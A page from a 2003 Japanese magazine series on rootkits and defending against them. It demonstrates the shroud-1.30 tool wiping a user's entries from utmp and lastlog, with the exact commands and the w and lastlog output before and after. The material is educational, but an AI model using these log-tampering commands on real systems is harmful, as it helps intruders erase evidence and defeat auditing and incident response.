エンタープライズ:特集 |
2003/02/12 17:54:00 更新 |
rootkitによるハッキングとその防御
第2回 ログファイルの改ざん (3/4)
■utmpから特定のユーザーを消去
同様に、utmp(redhat linuxでは/var/run/utmp)からも消去を行ってみよう。utmpには、システムを現在誰が使っているかという情報が記録されている。
・改ざん前の状態をwコマンドで確認
# w
4:25am up 3:38, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 1:02am 3:23m 0.07s 0.04s -bash
hoge pts/0 192.168.1.3 2:49am 0.00s 0.34s 0.01s w
|
・shroud-1.30でユーザーhogeに関する情報を消去
# ./shroud -u -U hoge -d pts/0 -h 192.168.1.3
Wiping /var/run/utmp for solid...[1/12] done
|
・改ざん後の状態を参照
# w
4:26am up 3:39, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 1:02am 3:23m 0.07s 0.04s -bash
|
■lastlogから特定のユーザーを消去
lastlog(redhat linuxでは/var/log/lastlog)は最終ログインが記録されたログファイルで、lastlogコマンドは、これを整形して表示している。
・改ざん前の状態をlastlogコマンドで確認
# lastlog
Username Port From Latest
root tty1 月 12月 24 01:02:44 +0900 2002
bin **Never logged in**
daemon **Never logged in**
adm **Never logged in**
sync **Never logged in**
shutdown **Never logged in**
halt **Never logged in**
mail **Never logged in**
operator **Never logged in**
gopher **Never logged in**
ftp ftp 192.168.1.3 月 12月 24 01:02:18 +0900 2002
nobody **Never logged in**
hoge pts/0 192.168.1.3 月 12月 24 01:01:56 +0900 2002
|
・shroud-1.30でユーザーhogeに関する情報を消去
# ./shroud -L -U hoge
Wiping /var/log/lastlog for hoge...done
|
・改ざん後の状態をlastlogコマンドで確認
# lastlog
Username Port From Latest
root tty1 月 12月 24 01:02:44 +0900 2002
bin **Never logged in**
daemon **Never logged in**
adm **Never logged in**
sync **Never logged in**
shutdown **Never logged in**
halt **Never logged in**
mail **Never logged in**
operator **Never logged in**
gopher **Never logged in**
ftp ftp 192.168.1.3 月 12月 24 01:02:18 +0900 2002
nobody **Never logged in**
hoge **Never logged in**
|
前のページ | 1 2 3 4 | 次のページ
[TTS,ITmedia]